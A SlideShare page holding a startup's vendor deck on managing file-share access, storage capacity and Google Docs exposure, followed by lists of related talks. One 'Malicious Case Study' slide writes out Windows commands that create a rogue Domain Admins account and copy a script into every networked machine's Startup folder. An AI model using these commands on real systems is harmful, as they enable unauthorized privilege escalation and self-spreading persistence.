SlideShare ist ein Scribd-Unternehmen logo
1 von 37
Downloaden Sie, um offline zu lesen
TM
Microsoft BizSpark
Startup of the Day!
Winning the war against data
Strategies to beat your arch nemesis: files.
Gil Zimmermann, CEO & Co-Founder
On-Premise & Cloud Data
(read: files)
Identify & Act
Access and Storage Control
Attention:
Your Data Hates You!
Aprigo IT Benchmark
• SaaS offering
• Over 1,000 companies using Aprigo
• Over 750TBs under management
• Exposure at 95%
• Cost savings potential at 71%
• Installs in under 5 minutes
Data Deluge is a Problem
• Files exploding everywhere
• 75-90% of all data is unstructured (files)
• Valuable business asset
• Touched by everyone
• Vulnerable & exposed
• Expensive to manage
IT Owns the Data Problem
Data Deluge
Data Users
Compliance & Regulation
Business Data Dependence
=
IT Budgets
IT Headcount
No Mid-Market Solutions
~
∅
IT Fires
Exposure
Disruptio
n
Waste
Access Problem Math
• ACLs allow 13 different rights to access an object
• 12 practical combinations of ACE settings
• Permissions can be granted or denied
• 2^13*12 = 98,304 different access rights you can define
• Can be applied to a user/group to form an ACE,
unlimited number of ACEs can be combined into an ACL
• Each file/folder can be attached to a different ACL
• Millions of files, hundreds/thousands of users
• Business needs to know who has access to what
Access Best Practices
• Typical Exposure (95+%)
• Everyone (66%)
• Domain Users (45%)
• Explicit Permissions (92%)
• Don't over-organize your users, use inheritance
• Rogue Users
• Local Admins (99%)
• Outsiders are a new threat on Google Docs (98%)
• Talk in business terms (exposure, audit, risk, etc)
Access Use Cases
• IT Audits
• Help-Desk
• Active Directory Migrations
• IT GRC
• Data Breaches
• Data Forensics
• Entitlement Reporting
Capacity Best Practices
• Start with the obvious:
• Untouched in 90 days (81%)
• Media files (35%) vs. documents (16%)
• Large files over 100MBs (49%)
• Gets harder every time, so dig deeper
• Orphaned files (by owner)
• Small files that multiply
• Talk in business terms ($/GB, overhead, etc.)
Capacity Use Cases
• Disk Full
• Data Center Consolidation
• Data Migration
• Storage Refresh
• Backup/Replication Window Failure
• Chargeback
• Tiering
Storage Planning
• Understanding the data composition
• Capacity
• Cost (primary & secondary)
• Growth rate
• Ownership
• Data-intensive initiatives
• Reclaim costs by better utilization
Google Docs Best Practices
• Basic settings
• Enable/disable sharing
• Set up alerts for external sharing
• Hope for the best...
• Google Apps APIs
• Dashboard plugin
• Discover new shares on your network
• Network Share tab
• Preliminary access view
• Capacity utilization
• Available on any network share
• Find exposure & savings w/Aprigo NINJA
Spiceworks Integration
Spiceworks Plug-in
Innocent Case Study
• Bill the CFO owns the Finance share
• ACMESRVFinanceSecrets contains some of
the company’s most sensitive data
• Bill and his group have access
• ‘Domain Users’ is the default permission
• All employees have access
• Those with access can share...
Malicious Case Study
• BUILTINAdministrators
• 2 Line script to get to DOMAINAdministrators
• net user /domain /add rogueuser roguepass
• net group /domain "Domain Admins" /add rogueuser
• 1 more line to total network access
• for /F %%i in ('net view') do copy /Y %0 "%%ic$documents and
settingsall usersstart menuprogramsstartup"
Aprigo’s Approach
Data
Dashboard
Reports & Audits
! Alerts & Monitoring
Aprigo Cloud Infrastructure
Capacity
Management
Access
Management
gDocs
Management
Access
Auditing
Cost
Calculator
IT
Benchmark Go-FIX ISV Apps
Customer
Integrations
Traditional Data Management
LAN
IT Environment
Server
NAS Appliances
(NetApp / EMC)
Windows
File ServersActive
Directory
Metadata
Collector
UI
Application
Servers
Analytics
Servers
Database
Servers
SAN
Network Shares
Web Services
AgentsAgents
AgentsAgents
AgentsAgents
SaaS Data Management
LAN
IT Environment
THE APRIGO SOLUTION (Single SIte)
Aprigo Back-End
(SAS70-II Data Center)
Web Services
Application
Servers
Analytics
Servers
Database
Servers
SAN
Encrypted
HTTPS Traffic
NAS Appliances
(NetApp / EMC)
Windows
File ServersActive
Directory Metadata
Collector
NINJA / UI
Network Shares
Data Dashboard
Capacity Management
Access Management
Access Auditing
IT Benchmarking
Google Docs Access
Winning the war against data- Strategies to beat your arch nemesis: files - Gil Zimmerman, Aprigo
Winning the war against data- Strategies to beat your arch nemesis: files - Gil Zimmerman, Aprigo
Winning the war against data- Strategies to beat your arch nemesis: files - Gil Zimmerman, Aprigo
Winning the war against data- Strategies to beat your arch nemesis: files - Gil Zimmerman, Aprigo
Winning the war against data- Strategies to beat your arch nemesis: files - Gil Zimmerman, Aprigo
Winning the war against data- Strategies to beat your arch nemesis: files - Gil Zimmerman, Aprigo
Winning the war against data- Strategies to beat your arch nemesis: files - Gil Zimmerman, Aprigo
Q & A
• Functionality
• Technology
• Plug-in
• On-Premise vs. Cloud
• Suggestions/Thoughts
• etc...
ThankYou!
Customer Segments
Education Financials Health
IT ConsultantsTechOil
Commercial Landscape
LowCost/Ease-of-use/Scalability
Complete Solution / Functionality
SaaS /
Cloud
Aprigo is the only SaaS solution. Running in minutes, globally.
Risk
&
Governan
ce
Storage &
Data
Mgmt
Homegrown
Leaders
Commodity

Weitere ähnliche Inhalte

Was ist angesagt?

DCD Converged Brazil 2016
DCD Converged Brazil 2016 DCD Converged Brazil 2016
DCD Converged Brazil 2016 Scott Carlson
 
IT Series: Cloud Computing Done Right CISOA 2011
IT Series: Cloud Computing Done Right CISOA 2011IT Series: Cloud Computing Done Right CISOA 2011
IT Series: Cloud Computing Done Right CISOA 2011Donald E. Hester
 
Storage that Powers Digital Business: Scality for Enterprise Backup
Storage that Powers Digital Business: Scality for Enterprise BackupStorage that Powers Digital Business: Scality for Enterprise Backup
Storage that Powers Digital Business: Scality for Enterprise BackupScality
 
Houd controle over uw data
Houd controle over uw dataHoud controle over uw data
Houd controle over uw dataICT-Partners
 
Moving Beyond Disaster Recovery to IT Resilience
Moving Beyond Disaster Recovery to IT ResilienceMoving Beyond Disaster Recovery to IT Resilience
Moving Beyond Disaster Recovery to IT ResiliencePT Datacomm Diangraha
 
A futuristic look at BnR: The rise of the machine learning
A futuristic look at BnR: The rise of the machine learningA futuristic look at BnR: The rise of the machine learning
A futuristic look at BnR: The rise of the machine learningVeritas Technologies LLC
 
Cloudciti Enterprise File Share (EFS)
Cloudciti Enterprise File Share (EFS)Cloudciti Enterprise File Share (EFS)
Cloudciti Enterprise File Share (EFS)PT Datacomm Diangraha
 
How Cloudera SDX can aid GDPR compliance
How Cloudera SDX can aid GDPR complianceHow Cloudera SDX can aid GDPR compliance
How Cloudera SDX can aid GDPR complianceCloudera, Inc.
 
Webinar: The Elephant in the Datacenter - Protect, Manage, & Leverage Unstruc...
Webinar: The Elephant in the Datacenter - Protect, Manage, & Leverage Unstruc...Webinar: The Elephant in the Datacenter - Protect, Manage, & Leverage Unstruc...
Webinar: The Elephant in the Datacenter - Protect, Manage, & Leverage Unstruc...Storage Switzerland
 
Data Protection Picture Book
Data Protection Picture BookData Protection Picture Book
Data Protection Picture BookJeremy Boss
 
Manage Complex Digital Assets at Massive Scale
Manage Complex Digital Assets at Massive ScaleManage Complex Digital Assets at Massive Scale
Manage Complex Digital Assets at Massive ScaleNuxeo
 
Accelerate your digital business transformation with 360 Data Management
Accelerate your digital business transformation with 360 Data ManagementAccelerate your digital business transformation with 360 Data Management
Accelerate your digital business transformation with 360 Data ManagementVeritas Technologies LLC
 
Romi tech cloud workspace overview
Romi tech   cloud workspace overviewRomi tech   cloud workspace overview
Romi tech cloud workspace overviewromitech
 
Regulatory Compliance and Long-Term Storage of Data
Regulatory Compliance and Long-Term Storage of DataRegulatory Compliance and Long-Term Storage of Data
Regulatory Compliance and Long-Term Storage of DataArkivum
 
Complete data management with Veritas, with Virgil Dobos
Complete data management with Veritas, with Virgil DobosComplete data management with Veritas, with Virgil Dobos
Complete data management with Veritas, with Virgil DobosVeritas Technologies LLC
 
Cloud Computing Design Considerations
Cloud Computing Design ConsiderationsCloud Computing Design Considerations
Cloud Computing Design ConsiderationsMike Kavis
 
What is Cloud Security, and Can I Have Some?
What is Cloud Security, and Can I Have Some?What is Cloud Security, and Can I Have Some?
What is Cloud Security, and Can I Have Some?John Kinsella
 
Making Data Protection Simple, Affordable, and BE Easy
Making Data Protection Simple, Affordable, and BE EasyMaking Data Protection Simple, Affordable, and BE Easy
Making Data Protection Simple, Affordable, and BE EasyVeritas Technologies LLC
 

Was ist angesagt? (20)

DCD Converged Brazil 2016
DCD Converged Brazil 2016 DCD Converged Brazil 2016
DCD Converged Brazil 2016
 
IT Series: Cloud Computing Done Right CISOA 2011
IT Series: Cloud Computing Done Right CISOA 2011IT Series: Cloud Computing Done Right CISOA 2011
IT Series: Cloud Computing Done Right CISOA 2011
 
Storage that Powers Digital Business: Scality for Enterprise Backup
Storage that Powers Digital Business: Scality for Enterprise BackupStorage that Powers Digital Business: Scality for Enterprise Backup
Storage that Powers Digital Business: Scality for Enterprise Backup
 
Houd controle over uw data
Houd controle over uw dataHoud controle over uw data
Houd controle over uw data
 
Moving Beyond Disaster Recovery to IT Resilience
Moving Beyond Disaster Recovery to IT ResilienceMoving Beyond Disaster Recovery to IT Resilience
Moving Beyond Disaster Recovery to IT Resilience
 
A futuristic look at BnR: The rise of the machine learning
A futuristic look at BnR: The rise of the machine learningA futuristic look at BnR: The rise of the machine learning
A futuristic look at BnR: The rise of the machine learning
 
Cloudciti Enterprise File Share (EFS)
Cloudciti Enterprise File Share (EFS)Cloudciti Enterprise File Share (EFS)
Cloudciti Enterprise File Share (EFS)
 
How Cloudera SDX can aid GDPR compliance
How Cloudera SDX can aid GDPR complianceHow Cloudera SDX can aid GDPR compliance
How Cloudera SDX can aid GDPR compliance
 
Webinar: The Elephant in the Datacenter - Protect, Manage, & Leverage Unstruc...
Webinar: The Elephant in the Datacenter - Protect, Manage, & Leverage Unstruc...Webinar: The Elephant in the Datacenter - Protect, Manage, & Leverage Unstruc...
Webinar: The Elephant in the Datacenter - Protect, Manage, & Leverage Unstruc...
 
Data Protection Picture Book
Data Protection Picture BookData Protection Picture Book
Data Protection Picture Book
 
Manage Complex Digital Assets at Massive Scale
Manage Complex Digital Assets at Massive ScaleManage Complex Digital Assets at Massive Scale
Manage Complex Digital Assets at Massive Scale
 
Accelerate your digital business transformation with 360 Data Management
Accelerate your digital business transformation with 360 Data ManagementAccelerate your digital business transformation with 360 Data Management
Accelerate your digital business transformation with 360 Data Management
 
IT Resilience Use Case
IT Resilience Use CaseIT Resilience Use Case
IT Resilience Use Case
 
Romi tech cloud workspace overview
Romi tech   cloud workspace overviewRomi tech   cloud workspace overview
Romi tech cloud workspace overview
 
Regulatory Compliance and Long-Term Storage of Data
Regulatory Compliance and Long-Term Storage of DataRegulatory Compliance and Long-Term Storage of Data
Regulatory Compliance and Long-Term Storage of Data
 
Complete data management with Veritas, with Virgil Dobos
Complete data management with Veritas, with Virgil DobosComplete data management with Veritas, with Virgil Dobos
Complete data management with Veritas, with Virgil Dobos
 
Cloud Computing Design Considerations
Cloud Computing Design ConsiderationsCloud Computing Design Considerations
Cloud Computing Design Considerations
 
What is Cloud Security, and Can I Have Some?
What is Cloud Security, and Can I Have Some?What is Cloud Security, and Can I Have Some?
What is Cloud Security, and Can I Have Some?
 
Cas 4
Cas 4Cas 4
Cas 4
 
Making Data Protection Simple, Affordable, and BE Easy
Making Data Protection Simple, Affordable, and BE EasyMaking Data Protection Simple, Affordable, and BE Easy
Making Data Protection Simple, Affordable, and BE Easy
 

Andere mochten auch

Keynote Address at 2013 CloudCon: A day in the life of the SMB by Michael To...
Keynote Address at 2013 CloudCon: A day in the life of the SMB  by Michael To...Keynote Address at 2013 CloudCon: A day in the life of the SMB  by Michael To...
Keynote Address at 2013 CloudCon: A day in the life of the SMB by Michael To...exponential-inc
 
PaaSword: A Holistic Data Privacy and Security by Design Framework for Cloud ...
PaaSword: A Holistic Data Privacy and Security by Design Framework for Cloud ...PaaSword: A Holistic Data Privacy and Security by Design Framework for Cloud ...
PaaSword: A Holistic Data Privacy and Security by Design Framework for Cloud ...Yiannis Verginadis
 
SMB Security Opportunity –Use and Plans for Solutions and Profile of "Securit...
SMB Security Opportunity –Use and Plans for Solutions and Profile of "Securit...SMB Security Opportunity –Use and Plans for Solutions and Profile of "Securit...
SMB Security Opportunity –Use and Plans for Solutions and Profile of "Securit...Motty Ben Atia
 
Keeping up with the Revolution in IT Security
Keeping up with the Revolution in IT SecurityKeeping up with the Revolution in IT Security
Keeping up with the Revolution in IT SecurityDistil Networks
 
Enterprise 2.0: What it is and why it matters
Enterprise 2.0: What it is and why it mattersEnterprise 2.0: What it is and why it matters
Enterprise 2.0: What it is and why it mattersdigitallibrary
 
Building a database security program
Building a database security programBuilding a database security program
Building a database security programmatt_presson
 
Security Essentials for the SMB IT Network (on a Shoestring Budget!) - Adam W...
Security Essentials for the SMB IT Network (on a Shoestring Budget!) - Adam W...Security Essentials for the SMB IT Network (on a Shoestring Budget!) - Adam W...
Security Essentials for the SMB IT Network (on a Shoestring Budget!) - Adam W...Spiceworks
 
Advanced IT and Cyber Security for Your Business
Advanced IT and Cyber Security for Your BusinessAdvanced IT and Cyber Security for Your Business
Advanced IT and Cyber Security for Your BusinessInfopulse
 
The next generation of IT security
The next generation of IT securityThe next generation of IT security
The next generation of IT securitySophos Benelux
 
Robbery Prevention for Small Businesses
Robbery Prevention for Small BusinessesRobbery Prevention for Small Businesses
Robbery Prevention for Small BusinessesFundera
 
Windows 10 Enterprise E3 - Best in Class Security and Control - Presented by ...
Windows 10 Enterprise E3 - Best in Class Security and Control - Presented by ...Windows 10 Enterprise E3 - Best in Class Security and Control - Presented by ...
Windows 10 Enterprise E3 - Best in Class Security and Control - Presented by ...David J Rosenthal
 
Security Guide For Small Business
Security Guide For Small BusinessSecurity Guide For Small Business
Security Guide For Small BusinessBrendanRose
 
Challenges Of Global Data Collection
Challenges Of Global Data Collection   Challenges Of Global Data Collection
Challenges Of Global Data Collection ResearchShare
 
5 Step Data Security Plan for Small Businesses
5 Step Data Security Plan for Small Businesses5 Step Data Security Plan for Small Businesses
5 Step Data Security Plan for Small BusinessesWilkins Consulting, LLC
 
Big data security challenges and recommendations!
Big data security challenges and recommendations!Big data security challenges and recommendations!
Big data security challenges and recommendations!cisoplatform
 
Small business data security
Small business data securitySmall business data security
Small business data securityDavid Usher
 
Big Data Security with Hadoop
Big Data Security with HadoopBig Data Security with Hadoop
Big Data Security with HadoopCloudera, Inc.
 
Infrastructure API Lightning Talk by Jeremy Pollard of box.com
Infrastructure API Lightning Talk by Jeremy Pollard of box.comInfrastructure API Lightning Talk by Jeremy Pollard of box.com
Infrastructure API Lightning Talk by Jeremy Pollard of box.comDevOps4Networks
 

Andere mochten auch (20)

Keynote Address at 2013 CloudCon: A day in the life of the SMB by Michael To...
Keynote Address at 2013 CloudCon: A day in the life of the SMB  by Michael To...Keynote Address at 2013 CloudCon: A day in the life of the SMB  by Michael To...
Keynote Address at 2013 CloudCon: A day in the life of the SMB by Michael To...
 
PaaSword: A Holistic Data Privacy and Security by Design Framework for Cloud ...
PaaSword: A Holistic Data Privacy and Security by Design Framework for Cloud ...PaaSword: A Holistic Data Privacy and Security by Design Framework for Cloud ...
PaaSword: A Holistic Data Privacy and Security by Design Framework for Cloud ...
 
SMB Security Opportunity –Use and Plans for Solutions and Profile of "Securit...
SMB Security Opportunity –Use and Plans for Solutions and Profile of "Securit...SMB Security Opportunity –Use and Plans for Solutions and Profile of "Securit...
SMB Security Opportunity –Use and Plans for Solutions and Profile of "Securit...
 
Keeping up with the Revolution in IT Security
Keeping up with the Revolution in IT SecurityKeeping up with the Revolution in IT Security
Keeping up with the Revolution in IT Security
 
Enterprise 2.0: What it is and why it matters
Enterprise 2.0: What it is and why it mattersEnterprise 2.0: What it is and why it matters
Enterprise 2.0: What it is and why it matters
 
Building a database security program
Building a database security programBuilding a database security program
Building a database security program
 
Security Essentials for the SMB IT Network (on a Shoestring Budget!) - Adam W...
Security Essentials for the SMB IT Network (on a Shoestring Budget!) - Adam W...Security Essentials for the SMB IT Network (on a Shoestring Budget!) - Adam W...
Security Essentials for the SMB IT Network (on a Shoestring Budget!) - Adam W...
 
Box.net overview
Box.net overviewBox.net overview
Box.net overview
 
Advanced IT and Cyber Security for Your Business
Advanced IT and Cyber Security for Your BusinessAdvanced IT and Cyber Security for Your Business
Advanced IT and Cyber Security for Your Business
 
The next generation of IT security
The next generation of IT securityThe next generation of IT security
The next generation of IT security
 
Robbery Prevention for Small Businesses
Robbery Prevention for Small BusinessesRobbery Prevention for Small Businesses
Robbery Prevention for Small Businesses
 
Windows 10 Enterprise E3 - Best in Class Security and Control - Presented by ...
Windows 10 Enterprise E3 - Best in Class Security and Control - Presented by ...Windows 10 Enterprise E3 - Best in Class Security and Control - Presented by ...
Windows 10 Enterprise E3 - Best in Class Security and Control - Presented by ...
 
Security Guide For Small Business
Security Guide For Small BusinessSecurity Guide For Small Business
Security Guide For Small Business
 
Challenges Of Global Data Collection
Challenges Of Global Data Collection   Challenges Of Global Data Collection
Challenges Of Global Data Collection
 
5 Step Data Security Plan for Small Businesses
5 Step Data Security Plan for Small Businesses5 Step Data Security Plan for Small Businesses
5 Step Data Security Plan for Small Businesses
 
Big data security challenges and recommendations!
Big data security challenges and recommendations!Big data security challenges and recommendations!
Big data security challenges and recommendations!
 
Small business data security
Small business data securitySmall business data security
Small business data security
 
Big Data Security with Hadoop
Big Data Security with HadoopBig Data Security with Hadoop
Big Data Security with Hadoop
 
Big data security
Big data securityBig data security
Big data security
 
Infrastructure API Lightning Talk by Jeremy Pollard of box.com
Infrastructure API Lightning Talk by Jeremy Pollard of box.comInfrastructure API Lightning Talk by Jeremy Pollard of box.com
Infrastructure API Lightning Talk by Jeremy Pollard of box.com
 

Ähnlich wie Winning the war against data- Strategies to beat your arch nemesis: files - Gil Zimmerman, Aprigo

Využijte svou Oracle databázi na maximum!
Využijte svou Oracle databázi na maximum!Využijte svou Oracle databázi na maximum!
Využijte svou Oracle databázi na maximum!MarketingArrowECS_CZ
 
Data Architecture Best Practices for Advanced Analytics
Data Architecture Best Practices for Advanced AnalyticsData Architecture Best Practices for Advanced Analytics
Data Architecture Best Practices for Advanced AnalyticsDATAVERSITY
 
PROACT SYNC 2013 - Breakout - CommVault IntelliSnap Recovery Manager de inzet...
PROACT SYNC 2013 - Breakout - CommVault IntelliSnap Recovery Manager de inzet...PROACT SYNC 2013 - Breakout - CommVault IntelliSnap Recovery Manager de inzet...
PROACT SYNC 2013 - Breakout - CommVault IntelliSnap Recovery Manager de inzet...Proact Netherlands B.V.
 
How Vulnerable is Your Critical Data?
How Vulnerable is Your Critical Data?How Vulnerable is Your Critical Data?
How Vulnerable is Your Critical Data?IBM Security
 
DBTA Data Summit : Eliminating the data constraint in Application Development
DBTA Data Summit : Eliminating the data constraint in Application DevelopmentDBTA Data Summit : Eliminating the data constraint in Application Development
DBTA Data Summit : Eliminating the data constraint in Application DevelopmentKyle Hailey
 
Build a modern platform for anti-money laundering 9.19.18
Build a modern platform for anti-money laundering 9.19.18Build a modern platform for anti-money laundering 9.19.18
Build a modern platform for anti-money laundering 9.19.18Cloudera, Inc.
 
E2 evc 3-2-1-rule - mikeresseler
E2 evc   3-2-1-rule - mikeresselerE2 evc   3-2-1-rule - mikeresseler
E2 evc 3-2-1-rule - mikeresselerMike Resseler
 
Protect your Database with Data Masking & Enforced Version Control
Protect your Database with Data Masking & Enforced Version Control	Protect your Database with Data Masking & Enforced Version Control
Protect your Database with Data Masking & Enforced Version Control DBmaestro - Database DevOps
 
Productionizing Hadoop: 7 Architectural Best Practices
Productionizing Hadoop: 7 Architectural Best PracticesProductionizing Hadoop: 7 Architectural Best Practices
Productionizing Hadoop: 7 Architectural Best PracticesMapR Technologies
 
Database Security Threats - MariaDB Security Best Practices
Database Security Threats - MariaDB Security Best PracticesDatabase Security Threats - MariaDB Security Best Practices
Database Security Threats - MariaDB Security Best PracticesMariaDB plc
 
Data security in the cloud
Data security in the cloud Data security in the cloud
Data security in the cloud IBM Security
 
Automating IT Analytics to Optimize Service Delivery and Cost at Safeway - A ...
Automating IT Analytics to Optimize Service Delivery and Cost at Safeway - A ...Automating IT Analytics to Optimize Service Delivery and Cost at Safeway - A ...
Automating IT Analytics to Optimize Service Delivery and Cost at Safeway - A ...TeamQuest Corporation
 
Designing Effective Storage Strategies to Meet Business Needs
Designing Effective Storage Strategies to Meet Business NeedsDesigning Effective Storage Strategies to Meet Business Needs
Designing Effective Storage Strategies to Meet Business NeedsBrian Anderson
 
Next Generation Datacenter Oracle - Alan Hartwell
Next Generation Datacenter Oracle - Alan HartwellNext Generation Datacenter Oracle - Alan Hartwell
Next Generation Datacenter Oracle - Alan HartwellHPDutchWorld
 
Oracle - Next Generation Datacenter - Alan Hartwell
Oracle - Next Generation Datacenter - Alan HartwellOracle - Next Generation Datacenter - Alan Hartwell
Oracle - Next Generation Datacenter - Alan HartwellHPDutchWorld
 
VMworld 2013: VMware Horizon Workspace at Scale: Deploying to 15,000 VMware E...
VMworld 2013: VMware Horizon Workspace at Scale: Deploying to 15,000 VMware E...VMworld 2013: VMware Horizon Workspace at Scale: Deploying to 15,000 VMware E...
VMworld 2013: VMware Horizon Workspace at Scale: Deploying to 15,000 VMware E...VMworld
 
Reducing the Chance of an Office 365 Security Breach
Reducing the Chance of an Office 365 Security BreachReducing the Chance of an Office 365 Security Breach
Reducing the Chance of an Office 365 Security BreachQuest
 
Controlling Access to IBM i Systems and Data
Controlling Access to IBM i Systems and DataControlling Access to IBM i Systems and Data
Controlling Access to IBM i Systems and DataPrecisely
 

Ähnlich wie Winning the war against data- Strategies to beat your arch nemesis: files - Gil Zimmerman, Aprigo (20)

Využijte svou Oracle databázi na maximum!
Využijte svou Oracle databázi na maximum!Využijte svou Oracle databázi na maximum!
Využijte svou Oracle databázi na maximum!
 
Data Architecture Best Practices for Advanced Analytics
Data Architecture Best Practices for Advanced AnalyticsData Architecture Best Practices for Advanced Analytics
Data Architecture Best Practices for Advanced Analytics
 
PROACT SYNC 2013 - Breakout - CommVault IntelliSnap Recovery Manager de inzet...
PROACT SYNC 2013 - Breakout - CommVault IntelliSnap Recovery Manager de inzet...PROACT SYNC 2013 - Breakout - CommVault IntelliSnap Recovery Manager de inzet...
PROACT SYNC 2013 - Breakout - CommVault IntelliSnap Recovery Manager de inzet...
 
How Vulnerable is Your Critical Data?
How Vulnerable is Your Critical Data?How Vulnerable is Your Critical Data?
How Vulnerable is Your Critical Data?
 
DBTA Data Summit : Eliminating the data constraint in Application Development
DBTA Data Summit : Eliminating the data constraint in Application DevelopmentDBTA Data Summit : Eliminating the data constraint in Application Development
DBTA Data Summit : Eliminating the data constraint in Application Development
 
Build a modern platform for anti-money laundering 9.19.18
Build a modern platform for anti-money laundering 9.19.18Build a modern platform for anti-money laundering 9.19.18
Build a modern platform for anti-money laundering 9.19.18
 
E2 evc 3-2-1-rule - mikeresseler
E2 evc   3-2-1-rule - mikeresselerE2 evc   3-2-1-rule - mikeresseler
E2 evc 3-2-1-rule - mikeresseler
 
Protect your Database with Data Masking & Enforced Version Control
Protect your Database with Data Masking & Enforced Version Control	Protect your Database with Data Masking & Enforced Version Control
Protect your Database with Data Masking & Enforced Version Control
 
Productionizing Hadoop: 7 Architectural Best Practices
Productionizing Hadoop: 7 Architectural Best PracticesProductionizing Hadoop: 7 Architectural Best Practices
Productionizing Hadoop: 7 Architectural Best Practices
 
Database Security Threats - MariaDB Security Best Practices
Database Security Threats - MariaDB Security Best PracticesDatabase Security Threats - MariaDB Security Best Practices
Database Security Threats - MariaDB Security Best Practices
 
Data security in the cloud
Data security in the cloud Data security in the cloud
Data security in the cloud
 
Data lake protection ft 3119 -ver1.0
Data lake protection   ft 3119 -ver1.0Data lake protection   ft 3119 -ver1.0
Data lake protection ft 3119 -ver1.0
 
Automating IT Analytics to Optimize Service Delivery and Cost at Safeway - A ...
Automating IT Analytics to Optimize Service Delivery and Cost at Safeway - A ...Automating IT Analytics to Optimize Service Delivery and Cost at Safeway - A ...
Automating IT Analytics to Optimize Service Delivery and Cost at Safeway - A ...
 
Designing Effective Storage Strategies to Meet Business Needs
Designing Effective Storage Strategies to Meet Business NeedsDesigning Effective Storage Strategies to Meet Business Needs
Designing Effective Storage Strategies to Meet Business Needs
 
Next Generation Datacenter Oracle - Alan Hartwell
Next Generation Datacenter Oracle - Alan HartwellNext Generation Datacenter Oracle - Alan Hartwell
Next Generation Datacenter Oracle - Alan Hartwell
 
Oracle - Next Generation Datacenter - Alan Hartwell
Oracle - Next Generation Datacenter - Alan HartwellOracle - Next Generation Datacenter - Alan Hartwell
Oracle - Next Generation Datacenter - Alan Hartwell
 
VMworld 2013: VMware Horizon Workspace at Scale: Deploying to 15,000 VMware E...
VMworld 2013: VMware Horizon Workspace at Scale: Deploying to 15,000 VMware E...VMworld 2013: VMware Horizon Workspace at Scale: Deploying to 15,000 VMware E...
VMworld 2013: VMware Horizon Workspace at Scale: Deploying to 15,000 VMware E...
 
Reducing the Chance of an Office 365 Security Breach
Reducing the Chance of an Office 365 Security BreachReducing the Chance of an Office 365 Security Breach
Reducing the Chance of an Office 365 Security Breach
 
Rubik cloud risks-jun2012
Rubik cloud risks-jun2012Rubik cloud risks-jun2012
Rubik cloud risks-jun2012
 
Controlling Access to IBM i Systems and Data
Controlling Access to IBM i Systems and DataControlling Access to IBM i Systems and Data
Controlling Access to IBM i Systems and Data
 

Mehr von Spiceworks

Checking your back ups without batting an eye
Checking your back ups without batting an eyeChecking your back ups without batting an eye
Checking your back ups without batting an eyeSpiceworks
 
SpiceWorld London 2012 presentation Eaton
SpiceWorld London 2012 presentation EatonSpiceWorld London 2012 presentation Eaton
SpiceWorld London 2012 presentation EatonSpiceworks
 
Spice world london 2012 Grey Howe
Spice world london 2012 Grey HoweSpice world london 2012 Grey Howe
Spice world london 2012 Grey HoweSpiceworks
 
Spice world london 2012 Ben Snape
Spice world london 2012 Ben SnapeSpice world london 2012 Ben Snape
Spice world london 2012 Ben SnapeSpiceworks
 
SpiceWorld London 2012 Presentation Matthieu Jaeger
SpiceWorld London 2012 Presentation Matthieu JaegerSpiceWorld London 2012 Presentation Matthieu Jaeger
SpiceWorld London 2012 Presentation Matthieu JaegerSpiceworks
 
EatonVirtualization, Connectivity and the Cloud — Trends Driving the Future o...
EatonVirtualization, Connectivity and the Cloud — Trends Driving the Future o...EatonVirtualization, Connectivity and the Cloud — Trends Driving the Future o...
EatonVirtualization, Connectivity and the Cloud — Trends Driving the Future o...Spiceworks
 
Bringing Patch Management to Spiceworks
Bringing Patch Management to SpiceworksBringing Patch Management to Spiceworks
Bringing Patch Management to SpiceworksSpiceworks
 
Introducing....Office 365
Introducing....Office 365Introducing....Office 365
Introducing....Office 365Spiceworks
 
Making Sense of the Cloud
Making Sense of the CloudMaking Sense of the Cloud
Making Sense of the CloudSpiceworks
 
Virtualization: A Case Study from the IT Trenches - Darren Schoen, Broward Ce...
Virtualization: A Case Study from the IT Trenches - Darren Schoen, Broward Ce...Virtualization: A Case Study from the IT Trenches - Darren Schoen, Broward Ce...
Virtualization: A Case Study from the IT Trenches - Darren Schoen, Broward Ce...Spiceworks
 
Making IT Easier to Manage Your Virtualized Environment - David Babbitt, Spic...
Making IT Easier to Manage Your Virtualized Environment - David Babbitt, Spic...Making IT Easier to Manage Your Virtualized Environment - David Babbitt, Spic...
Making IT Easier to Manage Your Virtualized Environment - David Babbitt, Spic...Spiceworks
 
Can't Do It with Spiceworks? You Can Build an Extension for That! - Scott Con...
Can't Do It with Spiceworks? You Can Build an Extension for That! - Scott Con...Can't Do It with Spiceworks? You Can Build an Extension for That! - Scott Con...
Can't Do It with Spiceworks? You Can Build an Extension for That! - Scott Con...Spiceworks
 
Raising the Bar on Remote Site Management - Francis Sullivan & Stephen Chudle...
Raising the Bar on Remote Site Management - Francis Sullivan & Stephen Chudle...Raising the Bar on Remote Site Management - Francis Sullivan & Stephen Chudle...
Raising the Bar on Remote Site Management - Francis Sullivan & Stephen Chudle...Spiceworks
 
A Whole New Way to Keep Track of Your People & IT Purchasing - Justin Perkins...
A Whole New Way to Keep Track of Your People & IT Purchasing - Justin Perkins...A Whole New Way to Keep Track of Your People & IT Purchasing - Justin Perkins...
A Whole New Way to Keep Track of Your People & IT Purchasing - Justin Perkins...Spiceworks
 
Going the Extra Mile in Network Monitoring & Management - Greg Kattawar, Spic...
Going the Extra Mile in Network Monitoring & Management - Greg Kattawar, Spic...Going the Extra Mile in Network Monitoring & Management - Greg Kattawar, Spic...
Going the Extra Mile in Network Monitoring & Management - Greg Kattawar, Spic...Spiceworks
 
Getting More Nitty-gritty Details on Your Network - Brian Gugliemetti, Spicew...
Getting More Nitty-gritty Details on Your Network - Brian Gugliemetti, Spicew...Getting More Nitty-gritty Details on Your Network - Brian Gugliemetti, Spicew...
Getting More Nitty-gritty Details on Your Network - Brian Gugliemetti, Spicew...Spiceworks
 
Keep IT Simple (& Get IT All Done!) with Spiceworks - Paul Luciano, Expand In...
Keep IT Simple (& Get IT All Done!) with Spiceworks - Paul Luciano, Expand In...Keep IT Simple (& Get IT All Done!) with Spiceworks - Paul Luciano, Expand In...
Keep IT Simple (& Get IT All Done!) with Spiceworks - Paul Luciano, Expand In...Spiceworks
 
How to Take an Enterprise Approach in a SMB World - Jeff Shuron, Sports Physi...
How to Take an Enterprise Approach in a SMB World - Jeff Shuron, Sports Physi...How to Take an Enterprise Approach in a SMB World - Jeff Shuron, Sports Physi...
How to Take an Enterprise Approach in a SMB World - Jeff Shuron, Sports Physi...Spiceworks
 
Using Spiceworks for Change Control - Justin Davison, R J Lee Group
Using Spiceworks for Change Control - Justin Davison, R J Lee GroupUsing Spiceworks for Change Control - Justin Davison, R J Lee Group
Using Spiceworks for Change Control - Justin Davison, R J Lee GroupSpiceworks
 
Back-up Solutions: Where to Cut Corners & Where Not To - Daniel Kimberlin, En...
